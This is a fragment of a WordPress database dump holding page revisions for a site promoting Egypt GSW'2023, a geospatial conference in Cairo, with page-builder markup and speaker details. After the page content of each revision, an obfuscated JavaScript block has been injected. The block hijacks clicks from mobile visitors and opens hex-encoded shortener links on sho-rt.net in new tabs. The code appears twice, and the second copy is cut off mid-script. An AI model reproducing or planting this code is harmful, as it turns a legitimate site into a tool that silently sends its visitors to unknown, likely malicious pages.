95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"REGISTRATION FEES \" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" margin_design_tab_text=\"\"]Opening of registration platform: soon[/ultimate_heading][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]Opening of registration platform: 01 September 2021[/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527107907{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]VIEW SHOWCASE[/dt_default_button][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-06 19:24:42','2022-10-06 19:24:42','',2167,'https://gsw2023.com/?p=2318',0,'revision','',0),
(2319,1,'2022-10-06 19:25:10','2022-10-06 19:25:10','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"REGISTRATION FEES \" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" margin_design_tab_text=\"\"]Opening of registration platform: soon[/ultimate_heading][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527107907{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]VIEW SHOWCASE[/dt_default_button][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const 